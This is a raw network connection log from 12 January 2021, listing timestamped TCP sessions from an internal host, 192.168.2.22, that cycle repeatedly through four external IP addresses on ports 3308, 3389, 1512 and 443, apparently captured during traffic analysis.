Jan 12, 2021 01:45:27.111737967 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.111782074 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.111859083 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.111927032 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.123420954 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.173734903 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.173921108 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.183270931 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.183484077 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.226705074 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.226946115 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.270216942 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.384511948 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.384562969 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.384653091 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.386276007 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.469316959 CET	49326	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:27.513004065 CET	3308	49326	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:27.583926916 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.638508081 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:27.638685942 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.640089989 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.694236040 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:27.730962992 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:27.731024981 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:27.731169939 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.731220007 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.744441032 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.806668997 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:27.806921005 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.816459894 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.816636086 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.871509075 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:27.871900082 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:27.910375118 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:27.926115990 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:27.926160097 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:28.016469955 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:28.016514063 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:28.016763926 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:28.022442102 CET	49327	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:28.076589108 CET	3389	49327	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:28.133270979 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.186172962 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.186403036 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.188239098 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.240834951 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.252629042 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.252675056 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.252770901 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.266702890 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.320537090 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.320708990 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.327788115 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.328017950 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.380748034 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.380950928 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.418368101 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.433911085 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.538388014 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.538435936 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.538703918 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.544305086 CET	49328	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:28.597351074 CET	1512	49328	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:28.662395000 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.714916945 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:28.715054989 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.716556072 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.768966913 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:28.783770084 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:28.784044027 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.801604986 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.857489109 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:28.857858896 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.866978884 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.867216110 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.919610977 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:28.919975996 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:28.972460985 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:29.091736078 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:29.091782093 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:29.091844082 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:29.091911077 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:29.096295118 CET	49329	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:29.148576975 CET	443	49329	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:29.206254005 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.249557018 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.249716043 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.251255989 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.294339895 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.304929018 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.304965019 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.305069923 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.319611073 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.365411997 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.365600109 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.375638008 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.375989914 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.419090033 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.419385910 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.462578058 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.575896978 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.575941086 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.576052904 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.581655979 CET	49330	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:29.624691963 CET	3308	49330	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:29.695106983 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.749020100 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:29.749129057 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.750478983 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.806473017 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:29.833595037 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:29.833640099 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:29.833759069 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.833808899 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.847038031 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.911665916 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:29.911990881 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.922147036 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.922276020 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:29.978355885 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:29.978770018 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:30.016756058 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:30.032665014 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:30.032701969 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:30.151755095 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:30.151801109 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:30.152081013 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:30.152143955 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:30.156416893 CET	49331	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:30.212630987 CET	3389	49331	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:30.272036076 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.324918032 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.325129032 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.326684952 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.379420042 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.386379957 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.386409998 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.386553049 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.386605978 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.394509077 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.448427916 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.448657990 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.457612038 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.457783937 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.510540962 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.510926008 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.550393105 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.563786030 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.563817978 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.664699078 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.664742947 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.665083885 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.670660973 CET	49332	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:30.723463058 CET	1512	49332	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:30.786839962 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:30.838768959 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:30.838964939 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:30.840528011 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:30.892128944 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:30.906864882 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:30.907061100 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:30.920829058 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:30.974997044 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:30.975250006 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:30.985402107 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:30.985721111 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:31.037523031 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:31.037812948 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:31.075305939 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:31.089945078 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:31.207510948 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:31.207556963 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:31.207854033 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:31.213382006 CET	49333	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:31.265419006 CET	443	49333	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:31.332950115 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.376173973 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.376359940 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.377398014 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.420464039 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.434783936 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.434838057 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.434937000 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.434983015 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.442192078 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.487034082 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.487159967 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.491816044 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.491996050 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.535204887 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.535406113 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.575314999 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.578653097 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.578691959 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.691203117 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.691252947 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.691504002 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.697062969 CET	49334	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:31.740426064 CET	3308	49334	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:31.815192938 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:31.869797945 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:31.869911909 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:31.871468067 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:31.925709963 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:31.954050064 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:31.954092026 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:31.954216003 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:31.966506958 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:32.027024984 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:32.027302027 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:32.036861897 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:32.036977053 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:32.091567039 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:32.091938972 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:32.131261110 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:32.146321058 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:32.146353960 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:32.235486984 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:32.235542059 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:32.235837936 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:32.241431952 CET	49335	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:32.295682907 CET	3389	49335	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:32.362787008 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.415779114 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.416110039 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.417865038 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.470555067 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.477374077 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.477459908 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.477543116 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.477595091 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.493419886 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.547400951 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.547827005 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.556782007 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.557014942 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.609807968 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.610054016 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.646378994 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.662971020 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.663017035 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.762834072 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.762881041 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.763246059 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.768755913 CET	49336	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:32.821798086 CET	1512	49336	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:32.893032074 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:32.945493937 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:32.945718050 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:32.947541952 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:32.999665976 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:33.014612913 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:33.014796019 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:33.029849052 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:33.084594965 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:33.084887981 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:33.095144987 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:33.095568895 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:33.147898912 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:33.148171902 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:33.200531960 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:33.318213940 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:33.318255901 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:33.318499088 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:33.324542046 CET	49337	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:33.376677990 CET	443	49337	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:33.439162016 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.482480049 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.482656956 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.484435081 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.527574062 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.538116932 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.538153887 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.538276911 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.538326025 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.554200888 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.599287987 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.599575043 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.609729052 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.610039949 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.653153896 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.653301954 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.693166018 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.696630955 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.696660995 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.809408903 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.809448004 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.809521914 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.809571981 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.814435005 CET	49338	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:33.857671022 CET	3308	49338	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:33.923867941 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:33.978040934 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:33.978152037 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:33.979669094 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.036185026 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.066648006 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.066684008 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.066797972 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.066836119 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.078898907 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.144640923 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.144963026 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.156809092 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.156909943 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.212023973 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.212291002 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.251455069 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.266539097 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.266604900 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.357372999 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.357506037 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.357606888 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.357620001 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.363198042 CET	49339	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:34.418380022 CET	3389	49339	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:34.484375000 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.537478924 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.537592888 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.539172888 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.591969013 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.598876953 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.598912001 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.598973036 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.599008083 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.612812042 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.667113066 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.667514086 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.689424992 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.689692020 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.742552996 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.742892981 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.782633066 CET	1512	49340	46.105.131.65	192.168.2.22
